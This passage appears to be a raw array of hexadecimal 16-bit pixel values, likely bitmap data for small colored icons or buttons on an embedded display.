0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X1E,0X06,0X00,0X00, 0X00,0X00,0X55,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X55,0X04,0X00,0X00,0X00,0X00,0X05,0X01, 0X1E,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X1E,0X06,0X05,0X01,0X00,0X00,0X00,0X00,0X00,0X00,0X05,0X01,0X96,0X04, 0X3E,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X3E,0X06,0X96,0X04,0X05,0X01, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X81,0X28,0X44,0XB2,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3, 0X44,0XB2,0X81,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X81,0X28,0X06,0XF3,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3, 0X81,0X28,0X00,0X00,0X00,0X00,0X24,0XAA,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X24,0XAA,0X00,0X00, 0X00,0X00,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0XAE,0XFC,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF, 0XFF,0XFF,0XFF,0XFF,0XF4,0XFD,0X26,0XFB,0X26,0XFB,0X93,0XFD,0XFF,0XFF,0XFF,0XFF, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC9,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE, 0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF, 0X1B,0XFF,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE, 0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X51,0XFD,0X98,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X98,0XFE,0X51,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X10,0XFD,0X36,0XFE,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X36,0XFE, 0X10,0XFD,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00, 0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X00,0X00,0X00,0X00,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X00,0X00,0X00,0X00,0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X00,0X00, 0X00,0X00,0X24,0XAA,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X24,0XAA,0X00,0X00,0X00,0X00,0X81,0X28, 0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X06,0XF3,0X81,0X28,0X00,0X00,0X00,0X00,0X00,0X00,0X81,0X28,0X44,0XB2, 0X06,0XF3,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB, 0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X26,0XFB,0X06,0XF3,0X44,0XB2,0X81,0X28, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X42,0X20,0X29,0X91,0X8C,0XC1,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC1, 0X29,0X91,0X42,0X20,0X00,0X00,0X00,0X00,0X00,0X00,0X42,0X20,0X8C,0XC1,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC1, 0X42,0X20,0X00,0X00,0X00,0X00,0X08,0X89,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X08,0X89,0X00,0X00, 0X00,0X00,0X8C,0XC1,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC1,0X00,0X00,0X00,0X00,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00, 0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XD6,0XE4,0XFF,0XFF, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X7B,0XF6,0X31,0XDB,0X8C,0XC9,0X8C,0XC9,0X92,0XDB, 0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X37,0XED,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0XDC,0XF6,0XFF,0XFF,0XFF,0XFF,0X37,0XED,0X0E,0XD2, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X31,0XDB,0XFF,0XFF,0X31,0XDB,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X75,0XE4,0X1A,0XF6,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4, 0X7B,0XF6,0XD0,0XD2,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X92,0XDB,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X00,0X00,0X00,0X00,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X8C,0XC9,0X8C,0XC9,0X1A,0XF6,0X75,0XE4,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9, 0X75,0XE4,0X37,0XED,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X75,0XE4,0X1A,0XF6, 0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0X8C,0XC9,0XFF,0XFF,0XD0,0XD2,0X8C,0XC9, 